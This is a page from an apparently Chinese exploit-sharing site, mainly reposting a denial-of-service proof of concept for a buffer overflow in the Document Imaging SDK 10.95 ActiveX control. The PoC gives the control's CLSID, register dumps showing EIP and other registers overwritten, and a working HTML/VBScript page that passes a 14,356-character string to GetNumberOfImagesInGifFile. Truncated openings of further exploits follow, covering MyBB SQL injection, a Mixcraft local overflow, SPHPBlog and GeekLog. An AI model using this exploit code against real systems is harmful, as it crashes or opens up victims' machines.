Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC
所属分类:
网络安全 / Exploit
阅读数:
97
收藏 0赞 0分享
<!--
Document Imaging SDK Buffer Overflow Vulnerability
DoS Proof of concept
Author: r0ut3r
Mail : writ3r [at] gmail.com
-----------------------------
-Tested on WinXP Pro SP2
Version: 10.95
Vendor : Black Ice Software
Price : $999
File : biimgfrm.ocx
CLSID: {79956462-F148-497F-B247-DF35A095F80B}
DLL Settings:
RegKey Safe for Script: True
RegKey Safe for Init : True
KillBitSet : False
Register:
EIP 7C91B3FB -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EAX 001919C0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBX 41414141
ECX 00004141
EDX 00150168 -> 00000000
EDI 41414141
ESI 001919B8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013EA20 -> 0013EAA4
ESP 0013E804 -> 0000021A
-----------------------------
-->
<object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='test'></object>
<script language='vbscript'>
Sub Boom
buff = String(14356, "A")
test.GetNumberOfImagesInGifFile buff
End Sub
</script>
<input type=button onclick=Boom() value='Boom?'>
MyBulletinBoard (MyBB)
<?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe
收藏 0赞 0分享
Acoustica Mixcraft
#!/usr/bin/perl
#
# Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit
# Author: Koshi
#
# Date: 08-28-08 ( 0day )
# Ap
收藏 0赞 0分享
Simple PHP Blog (SPHPBlog)
<?
/*
sIMPLE php bLOG 0.5.0 eXPLOIT
bY mAXzA 2008
*/
function curl($url,$postvar){
global $cook;
$ch = cur
收藏 0赞 0分享
GeekLog
#!/usr/bin/perl
use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
收藏 0赞 0分享
NoName Script
################################################################################
[ ] NoName Script 1.1 BETA Multiple Remote Vulnerabiliti
收藏 0赞 0分享
查看更多